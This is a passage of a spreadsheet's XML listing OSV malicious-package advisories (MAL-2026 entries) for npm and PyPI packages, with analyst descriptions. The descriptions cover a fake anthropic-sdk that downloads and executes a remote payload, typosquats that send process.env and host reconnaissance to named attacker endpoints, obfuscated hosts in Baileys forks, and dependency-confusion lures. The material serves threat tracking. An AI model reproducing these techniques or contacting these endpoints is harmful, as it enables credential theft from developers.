          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q126" s="5" t="inlineStr"/>
      <c r="R126" s="5" t="inlineStr"/>
      <c r="S126"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
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (594062e4a945ccd7c67e7a5f03085fbd2eecda766d5347b81e7012399fb1f447)
package.json declares `"libsignal": "npm:@bellaxchuu/libsignal-node@latest"`, aliasing the Signal-protocol crypto dependency to a package published under the unrelated `@bellaxchuu` scope with the mutable `latest` tag and no integrity check. Every `npm install` of @xatancchii/velycxbail resolves libsignal to whatever the current head of `@bellaxchuu/libsignal-node` is at install time. The aliased package is consumed by lib/Utils/crypto.js, which is reached from the main entry through the Utils layer, so arbitrary future content published to that third-party scope loads and executes as part of normal use. The scope does not match the Baileys/WhatsApp publisher chain the fork claims to derive from, so control over the code path executed on installers rests with an unrelated third party.
</t>
        </is>
      </c>
      <c r="T126" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17383</t>
        </is>
      </c>
    </row>
    <row r="127">
      <c r="A127" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B127" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C127" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17404</t>
        </is>
      </c>
      <c r="D127" s="5" t="inlineStr"/>
      <c r="E127" s="5" t="inlineStr"/>
      <c r="F127" s="5" t="inlineStr"/>
      <c r="G127" s="5" t="inlineStr"/>
      <c r="H127" s="5" t="inlineStr"/>
      <c r="I127" s="5" t="inlineStr"/>
      <c r="J127" s="5" t="inlineStr"/>
      <c r="K127" s="5" t="inlineStr"/>
      <c r="L127" s="5" t="inlineStr">
        <is>
          <t>npm:saturn-baileys</t>
        </is>
      </c>
      <c r="M127" s="5" t="inlineStr"/>
      <c r="N127" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O127" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P127" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q127" s="5" t="inlineStr"/>
      <c r="R127" s="5" t="inlineStr"/>
      <c r="S127"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
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (098af0c774d7e3d1a8b2da57e35d5e2686e2149ad6f01fa13803cd1a54325058)
saturn-baileys is a fork of the Baileys WhatsApp library. In lib/Socket/messages-send.js at lines 425 and 436, a network destination is reconstructed at runtime from a String.fromCharCode(...) decimal array rather than appearing as a plain string literal. The decoded value is the URL https://fiora.nixel.my.id/. The obfuscation is placed inside the message-send code path of a messaging library that handles user credentials, session data, and message content, and the destination is not a documented WhatsApp/Baileys endpoint. Reconstructing a hardcoded non-first-party host via char-code decoding inside a send routine is the exfiltration/silent-relay shape for messaging-library trojans and is inconsistent with any legitimate use in this location.
</t>
        </is>
      </c>
      <c r="T127" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17404</t>
        </is>
      </c>
    </row>
    <row r="128">
      <c r="A128" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B128" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C128" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17405</t>
        </is>
      </c>
      <c r="D128" s="5" t="inlineStr"/>
      <c r="E128" s="5" t="inlineStr"/>
      <c r="F128" s="5" t="inlineStr"/>
      <c r="G128" s="5" t="inlineStr"/>
      <c r="H128" s="5" t="inlineStr"/>
      <c r="I128" s="5" t="inlineStr"/>
      <c r="J128" s="5" t="inlineStr"/>
      <c r="K128" s="5" t="inlineStr"/>
      <c r="L128" s="5" t="inlineStr">
        <is>
          <t>npm:shadowmd</t>
        </is>
      </c>
      <c r="M128" s="5" t="inlineStr"/>
      <c r="N128" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O128" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P128" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q128" s="5" t="inlineStr"/>
      <c r="R128" s="5" t="inlineStr"/>
      <c r="S128"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
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (926dc7dcc164af51175755e81a7a6eabb878244ecc173974ab577a1569ce1ff4)
lib/Socket/messages-send.js at lines 425 and 436 reconstructs the URL https://fiora.nixel.my.id/ from a String.fromCharCode decimal-ASCII array rather than a plain string literal. The host is assembled inside the package's WhatsApp socket message-send code path, so on every message-send flow the runtime resolves to an off-host destination whose identity is hidden from source-level inspection. Obfuscated destination reconstruction in a messaging library's send path is the fingerprint of a Baileys-family fork that intercepts or mirrors session/message data through an author-controlled endpoint; the destination fiora.nixel.my.id is unrelated to the WhatsApp protocol and is not documented as a caller-configurable endpoint.
</t>
        </is>
      </c>
      <c r="T128" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17405</t>
        </is>
      </c>
    </row>
    <row r="129">
      <c r="A129" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B129" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C129" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17472</t>
        </is>
      </c>
      <c r="D129" s="5" t="inlineStr"/>
      <c r="E129" s="5" t="inlineStr"/>
      <c r="F129" s="5" t="inlineStr"/>
      <c r="G129" s="5" t="inlineStr"/>
      <c r="H129" s="5" t="inlineStr"/>
      <c r="I129" s="5" t="inlineStr"/>
      <c r="J129" s="5" t="inlineStr"/>
      <c r="K129" s="5" t="inlineStr"/>
      <c r="L129" s="5" t="inlineStr">
        <is>
          <t>PyPI:anthropic-sdk</t>
        </is>
      </c>
      <c r="M129" s="5" t="inlineStr"/>
      <c r="N129" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O129" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P129" s="5" t="inlineStr">
        <is>
          <t>2026-10-05</t>
        </is>
      </c>
      <c r="Q129" s="5" t="inlineStr"/>
      <c r="R129" s="5" t="inlineStr"/>
      <c r="S129" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (500869e36b3f76202b63e8db9087adcfc42c8281a27a4402a21285aabde7a511)
The package publishes as `anthropic-sdk` and re-exports the official `anthropic` client's symbols (`from anthropic import *`; re-exports of `Anthropic`/`AsyncAnthropic`), presenting itself as a drop-in for the official SDK. On `import anthropic_sdk`, `__init__.py` imports a `_usage` module that auto-runs a boot routine. That routine increments a run counter persisted to `~/.config/anthropic-sdk/usage.json` and, from the third import onward, fetches `https://cdn.jsdelivr.net/gh/shred0day/payload@main/payload.py` — a third-party user's GitHub repository on a mutable branch, unrelated to Anthropic and with no pin or integrity check — then caches the response base64-encoded to `~/.config/anthropic-sdk/lr.json`, compiles it, `exec()`s it, and calls its `entry()` function. The import-count gate before the first fetch and the base64-at-rest caching of the fetched source serve no legitimate update-check purpose and are consistent with sandbox/analysis evasion. Whoever controls the referenced GitHub repository controls arbitrary code execution on any machine that imports this package.
## Source: kam193 (6844e60d4a58dd11040255e8d632bcca66ae02b1048674e79bddbac1b337f442)
During import, package downloads a remote script, fingerprints the environment looking for sandbox signs, and after a delay exfiltrates sensitive data: credentials, env variables, AI chat files, SSH keys and so on. If exfiltration via HTTPS fails, it attempts DNS-based exfiltration. Additionally, package uses DNS to centrally hold execution.
---
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-10-anthropic-sdk
Reasons (based on the campaign):
 - impersonation
 - Downloads and executes a remote malicious script.
 - The package contains code to detect if it is running in a sandbox environment.
 - obfuscation
 - exfiltration-credentials
 - files-exfiltration
 - exfiltration-env-variables
 - exfiltration-ssh-keys
</t>
        </is>
      </c>
      <c r="T129" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17472</t>
        </is>
      </c>
    </row>
    <row r="130">
      <c r="A130" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B130" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C130" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17473</t>
        </is>
      </c>
      <c r="D130" s="5" t="inlineStr"/>
      <c r="E130" s="5" t="inlineStr"/>
      <c r="F130" s="5" t="inlineStr"/>
      <c r="G130" s="5" t="inlineStr"/>
      <c r="H130" s="5" t="inlineStr"/>
      <c r="I130" s="5" t="inlineStr"/>
      <c r="J130" s="5" t="inlineStr"/>
      <c r="K130" s="5" t="inlineStr"/>
      <c r="L130" s="5" t="inlineStr">
        <is>
          <t>npm:chai-as-testmode</t>
        </is>
      </c>
      <c r="M130" s="5" t="inlineStr"/>
      <c r="N130" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O130" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P130" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q130" s="5" t="inlineStr"/>
      <c r="R130" s="5" t="inlineStr"/>
      <c r="S130" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (af5e91a44a2eb0773df19fce2096660c285bafbe846a5f09d8bb25ff0eba22b2)
The package masquerades as the pino logging library (README badges and lib/ contents mimic pino) but ships a dropper at lib/initializeCaller.js. A self-executing IIFE POSTs the full process.env object to a base64-concealed endpoint that decodes to https://ipcheck-hashed.vercel.app/api/auth/b4dadd6a26d820d08596, using an 'x-secret-header: secret' header, and then passes the HTTP response body to new Function('require', response.data) with require handed in — executing attacker-returned JavaScript in the installer's Node process. The transmitted payload is the entire environment (not a single named variable), which on developer and CI machines typically includes NPM_TOKEN, GITHUB_TOKEN, AWS_* credentials, and other CI secrets. The destination URL is stored base64-encoded to conceal it from casual inspection, and the typosquat-style package name together with pino-themed documentation form a cover story for the dropper.
</t>
        </is>
      </c>
      <c r="T130" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17473</t>
        </is>
      </c>
    </row>
    <row r="131">
      <c r="A131" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B131" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C131" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17474</t>
        </is>
      </c>
      <c r="D131" s="5" t="inlineStr"/>
      <c r="E131" s="5" t="inlineStr"/>
      <c r="F131" s="5" t="inlineStr"/>
      <c r="G131" s="5" t="inlineStr"/>
      <c r="H131" s="5" t="inlineStr"/>
      <c r="I131" s="5" t="inlineStr"/>
      <c r="J131" s="5" t="inlineStr"/>
      <c r="K131" s="5" t="inlineStr"/>
      <c r="L131" s="5" t="inlineStr">
        <is>
          <t>npm:core-js-gnz</t>
        </is>
      </c>
      <c r="M131" s="5" t="inlineStr"/>
      <c r="N131" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O131" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P131" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q131" s="5" t="inlineStr"/>
      <c r="R131" s="5" t="inlineStr"/>
      <c r="S131" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (dc57686b95f827f2c3b0501d97b6575e077247255bf5d4227ae9bc8bedd43937)
On install, package.json runs `node init.js` as a postinstall hook. init.js collects host identifiers (os.hostname(), os.userInfo().username, os.platform(), os.arch(), node version, OS release) and POSTs them to https://helper.businesse-vip1.workers.dev/report, then fetches an AES-256-GCM encrypted blob from the /e endpoint on the same host (with TLS verification disabled via rejectUnauthorized:false), decrypts it in-process, writes the decoded content to the user cache directory as exec_runtime.py, and spawns a detached python3 process to execute it (stdio:'ignore', windowsHide, detached:true). Execution is gated on developer-machine heuristics (presence of Desktop/Documents/Downloads in the home directory) and rate-limited via a hidden ~/.cache/core-js-buffer/.init_check marker, with cover-story identifiers ('Environment check', 'TelemetrySender', a BIP-174 seed label). The package name and README advertise an unrelated hex-buffer utility, which does not match the observed behavior.
</t>
        </is>
      </c>
      <c r="T131" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17474</t>
        </is>
      </c>
    </row>
    <row r="132">
      <c r="A132" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B132" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C132" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17475</t>
        </is>
      </c>
      <c r="D132" s="5" t="inlineStr"/>
      <c r="E132" s="5" t="inlineStr"/>
      <c r="F132" s="5" t="inlineStr"/>
      <c r="G132" s="5" t="inlineStr"/>
      <c r="H132" s="5" t="inlineStr"/>
      <c r="I132" s="5" t="inlineStr"/>
      <c r="J132" s="5" t="inlineStr"/>
      <c r="K132" s="5" t="inlineStr"/>
      <c r="L132" s="5" t="inlineStr">
        <is>
          <t>npm:css-a11y-contrast-utils</t>
        </is>
      </c>
      <c r="M132" s="5" t="inlineStr"/>
      <c r="N132" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O132" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P132" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q132" s="5" t="inlineStr"/>
      <c r="R132" s="5" t="inlineStr"/>
      <c r="S132" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (85ad65ab7d49c4277898f5da5b5d45f3ec9cde46035bcf6416e3a95507ca1301)
css-a11y-contrast-utils@1.0.0 is advertised as a WCAG contrast utility but ships no contrast code — index.js exports an empty object. The package instead defines a Proxy stub exposing identifiers from Wix's internal Thunderbolt registry namespace (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.), and its manifest points at static.parastorage.com/unpkg/css-a11y-contrast-utils, consistent with a dependency-confusion squat targeting a private Wix registry. On module load, thunderboltRegistry.js runs an IIFE that executes `hostname`, `id`, and `uname -r` via child_process and exfiltrates the collected host, uid, kernel version, Node version, and pid by (a) issuing DNS lookups to subdomains of the hardcoded OAST collector davdpb8lhot13kgmnhp0863x9g83mpswq.oast.live and (b) HTTP GET to the hardcoded webhook https://webhook.site/0492a36c-4d7b-408a-865c-226db25987ba. The cover-story metadata plus internal-registry naming plus the on-load recon beacon make the entire purpose of the package a dependency-confusion payload against installers that resolve any of these registry names.
</t>
        </is>
      </c>
      <c r="T132" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17475</t>
        </is>
      </c>
    </row>
    <row r="133">
      <c r="A133" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B133" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C133" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17476</t>
        </is>
      </c>
      <c r="D133" s="5" t="inlineStr"/>
      <c r="E133" s="5" t="inlineStr"/>
      <c r="F133" s="5" t="inlineStr"/>
      <c r="G133" s="5" t="inlineStr"/>
      <c r="H133" s="5" t="inlineStr"/>
      <c r="I133" s="5" t="inlineStr"/>
      <c r="J133" s="5" t="inlineStr"/>
      <c r="K133" s="5" t="inlineStr"/>
      <c r="L133" s="5" t="inlineStr">
        <is>
          <t>npm:css-anchor-pos-fallback</t>
        </is>
      </c>
      <c r="M133" s="5" t="inlineStr"/>
      <c r="N133" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O133" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P133" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q133" s="5" t="inlineStr"/>
      <c r="R133" s="5" t="inlineStr"/>
      <c r="S133" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (bd0a6c8e1448ffd9abb3732872ea3d49280a422d49524aaa57d0b89a73812f05)
The package advertises itself as a CSS anchor-position polyfill but on require executes an IIFE in thunderboltRegistry.js that runs `id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`, and reads `/etc/hosts`, then POSTs the collected output along with hostname, platform, and Node version via fetch to the hardcoded external endpoint http://dxpoc.gt.tc/callback.php/. The module also exports keys named after Wix thunderbolt internal registries (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, etc.) with a bundled manifest referencing a parastorage.com unpkg URL, a shape consistent with dependency-confusion targeting of an internal Wix build pipeline. The advertised polyfill purpose is unrelated to shell execution, host reconnaissance, or outbound beaconing.
</t>
        </is>
      </c>
      <c r="T133" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17476</t>
        </is>
      </c>
    </row>
    <row r="134">
      <c r="A134" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B134" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C134" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17477</t>
        </is>
      </c>
      <c r="D134" s="5" t="inlineStr"/>
      <c r="E134" s="5" t="inlineStr"/>
      <c r="F134" s="5" t="inlineStr"/>
      <c r="G134" s="5" t="inlineStr"/>
      <c r="H134" s="5" t="inlineStr"/>
      <c r="I134" s="5" t="inlineStr"/>
      <c r="J134" s="5" t="inlineStr"/>
      <c r="K134" s="5" t="inlineStr"/>
      <c r="L134" s="5" t="inlineStr">
        <is>
          <t>npm:css-env-function-shim</t>
        </is>
      </c>
      <c r="M134" s="5" t="inlineStr"/>
      <c r="N134" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O134" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P134" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q134" s="5" t="inlineStr"/>
      <c r="R134" s="5" t="inlineStr"/>
      <c r="S134" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (03e6fced50259d6d3781ef3917caba965e4744420188c3e06919541b64e2e294)
Package self-describes as a CSS env() shim but ships thunderboltRegistry.js, which runs an IIFE at module load that base64-decodes the strings 'child_process' and 'execSync', dynamically requires child_process, and shells out whoami, uname, cat /etc/hosts, ifconfig/ip addr, id, and hostname. The collected output is POSTed to a hardcoded webhook.site URL (webhook.site/0492a36c-4d7b-408a-865c-226db25987ba) and beaconed to a subdomain of davdpb8lhot13kgmnhp0863x9g83mpswq.oast.live for DNS exfiltration. All sensitive identifiers (module name, method name, commands, destination host, UUID path, OAST subdomain) are stored as base64 blobs or String.fromCharCode arrays and reconstructed at runtime to defeat static inspection. index.js is a stub; the module factory is re-exported under nine Wix-internal registry key names (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, and similar), and the shipped registry-manifest.min.json aliases numerous Wix thunderbolt *Registry.js URLs on parastorage.com to this package's thunderboltRegistry.js — a dependency-confusion lure targeting Wix's internal build so that any importer of those names triggers the exfiltration IIFE at require time.
</t>
        </is>
      </c>
      <c r="T134" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17477</t>
        </is>
      </c>
    </row>
    <row r="135">
      <c r="A135" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B135" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C135" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17478</t>
        </is>
      </c>
      <c r="D135" s="5" t="inlineStr"/>
      <c r="E135" s="5" t="inlineStr"/>
      <c r="F135" s="5" t="inlineStr"/>
      <c r="G135" s="5" t="inlineStr"/>
      <c r="H135" s="5" t="inlineStr"/>
      <c r="I135" s="5" t="inlineStr"/>
      <c r="J135" s="5" t="inlineStr"/>
      <c r="K135" s="5" t="inlineStr"/>
      <c r="L135" s="5" t="inlineStr">
        <is>
          <t>npm:css-field-sizing-polyfill</t>
        </is>
      </c>
      <c r="M135" s="5" t="inlineStr"/>
      <c r="N135" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O135" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P135" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q135" s="5" t="inlineStr"/>
      <c r="R135" s="5" t="inlineStr"/>
      <c r="S135" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (549bb8820cb6a8a35853826d17b64df14c0561b83790192a33c5dc76dbad53b9)
The package advertises itself as a CSS field-sizing polyfill but ships thunderboltRegistry.js, which runs an IIFE at module load time. The IIFE shells out via child_process.execSync to run `id`, `whoami`, `uname -a`, `ifconfig`/`ip addr`, and `cat /etc/hosts`, then transmits the collected output together with hostname, Node version, platform, and pid as query-string parameters to the hardcoded plaintext endpoint http://dxpoc.gt.tc/callback.php/bb8968d0f67000433bf7005dd5ad2d1f. The module also exports proxied stubs for Wix-internal names (`thunderboltRegistry`, `siteAssetsRegistry`, `documentManagementRegistry`, `editorRegistry`, `corvidRegistry`) and ships a `registry-manifest.min.json` pointing at `static.parastorage.com`, indicating a dependency-confusion impersonation of Wix internal packages so that an internal resolver pulling this public name will trigger the beacon. The reconnaissance behavior is unrelated to the declared CSS polyfill purpose and fires on any `require()` of the package.
</t>
        </is>
      </c>
      <c r="T135" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17478</t>
        </is>
      </c>
    </row>
    <row r="136">
      <c r="A136" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B136" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C136" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17479</t>
        </is>
      </c>
      <c r="D136" s="5" t="inlineStr"/>
      <c r="E136" s="5" t="inlineStr"/>
      <c r="F136" s="5" t="inlineStr"/>
      <c r="G136" s="5" t="inlineStr"/>
      <c r="H136" s="5" t="inlineStr"/>
      <c r="I136" s="5" t="inlineStr"/>
      <c r="J136" s="5" t="inlineStr"/>
      <c r="K136" s="5" t="inlineStr"/>
      <c r="L136" s="5" t="inlineStr">
        <is>
          <t>npm:css-gap-decorations-polyfill</t>
        </is>
      </c>
      <c r="M136" s="5" t="inlineStr"/>
      <c r="N136" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O136" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P136" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q136" s="5" t="inlineStr"/>
      <c r="R136" s="5" t="inlineStr"/>
      <c r="S136" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (8126656cc344a4f632b8ddf5a23683fc92ac22798bb67e1aed6bca73ac82d7b6)
The package is published as a CSS polyfill but ships no polyfill functionality. On require(), thunderboltRegistry.js uses child_process.execSync to run whoami, uname -a, ifconfig/ip addr, and read /etc/hosts, then sends each result along with a beacon (node version, platform, pid) as query parameters to the hardcoded attacker-controlled endpoint http://dxpoc.gt.tc/callback.php/ef9ea0e191006f3cc6670720c99c26f3. The package exposes stub factories under internal-sounding names (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, corvidRegistry, and others) and bundles a registry-manifest.min.json mapping them all to a single parastorage.com asset, consistent with a dependency-confusion attack targeting a private Wix/Thunderbolt package namespace. Installer harm: host identity, kernel version, network configuration, and /etc/hosts contents are exfiltrated to an attacker-controlled host simply by resolving and loading the package.
</t>
        </is>
      </c>
      <c r="T136" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17479</t>
        </is>
      </c>
    </row>
    <row r="137">
      <c r="A137" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B137" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C137" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17480</t>
        </is>
      </c>
      <c r="D137" s="5" t="inlineStr"/>
      <c r="E137" s="5" t="inlineStr"/>
      <c r="F137" s="5" t="inlineStr"/>
      <c r="G137" s="5" t="inlineStr"/>
      <c r="H137" s="5" t="inlineStr"/>
      <c r="I137" s="5" t="inlineStr"/>
      <c r="J137" s="5" t="inlineStr"/>
      <c r="K137" s="5" t="inlineStr"/>
      <c r="L137" s="5" t="inlineStr">
        <is>
          <t>npm:css-interop-observer-polyfill</t>
        </is>
      </c>
      <c r="M137" s="5" t="inlineStr"/>
      <c r="N137" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O137" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P137" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q137" s="5" t="inlineStr"/>
      <c r="R137" s="5" t="inlineStr"/>
      <c r="S137" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (089bdc1dd6bdf0216bb911888e81ce97dc171bdef2588fd5de0aadb4a64fbb2b)
On module load, thunderboltRegistry.js executes an IIFE that runs id, whoami, uname, ifconfig/ip addr via child_process.execSync and reads /etc/hosts, then sends each result together with hostname, node version, platform and pid to the hardcoded endpoint http://dxpoc.gt.tc/callback.php/[token] via fetch over plain HTTP. The package presents itself as a stub exporting proxies for Wix thunderbolt internal registry names (thunderboltRegistry, siteAssetsRegistry, editorRegistry, corvidRegistry, etc.), consistent with dependency-confusion targeting of those internal module names while the load-time code performs the host reconnaissance and exfiltration.
</t>
        </is>
      </c>
      <c r="T137" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17480</t>
        </is>
      </c>
    </row>
    <row r="138">
      <c r="A138" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B138" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C138" s="5" t="inlineStr">
        <is>
          <t>MAL-2026-17481</t>
        </is>
      </c>
      <c r="D138" s="5" t="inlineStr"/>
      <c r="E138" s="5" t="inlineStr"/>
      <c r="F138" s="5" t="inlineStr"/>
      <c r="G138" s="5" t="inlineStr"/>
      <c r="H138" s="5" t="inlineStr"/>
      <c r="I138" s="5" t="inlineStr"/>
      <c r="J138" s="5" t="inlineStr"/>
      <c r="K138" s="5" t="inlineStr"/>
      <c r="L138" s="5" t="inlineStr">
        <is>
          <t>npm:css-light-dark-polyfill</t>
        </is>
      </c>
      <c r="M138" s="5" t="inlineStr"/>
      <c r="N138" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O138" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="P138" s="5" t="inlineStr">
        <is>
          <t>2026-10-04</t>
        </is>
      </c>
      <c r="Q138" s="5" t="inlineStr"/>
      <c r="R138" s="5" t="inlineStr"/>
      <c r="S138" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (856c154d7855924568c88181f172f46e84aac202bd6cb29974eb2ffaa3ec3ea7)
The package presents itself as a trivial CSS polyfill (index.js exports an empty object) but ships thunderboltRegistry.js, which on load runs a self-invoking IIFE that collects host identifiers (os.hostname, node version, platform, pid) and the output of local shell commands (id, whoami, uname -a, ifconfig/ip addr, /etc/hosts via child_process.execSync) and POSTs each result via fetch() to the hardcoded endpoint https://dxpoc.gt.tc/callback.php/. The payload self-labels as 'beacon=rce-poc'. The package also exports factories under the names of internal Wix Thunderbolt build registries (thunderboltRegistry, siteAssetsRegistry, documentManagementRegistry, editorRegistry, etc.), and a bundled registry-manifest.min.json maps those names to parastorage.com URLs — a dependency-confusion shape targeting Wix-like build systems that resolve these internal registry module names. Installing or loading this package causes host reconnaissance data to be exfiltrated to an attacker-controlled domain unrelated to any CSS polyfill functionality.
</t>
        </is>
      </c>
      <c r="T138" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/MAL-2026-17481</t>
        </is>
      </c>
    </row>
    <row r="139">
      <c r="A139" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B139" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
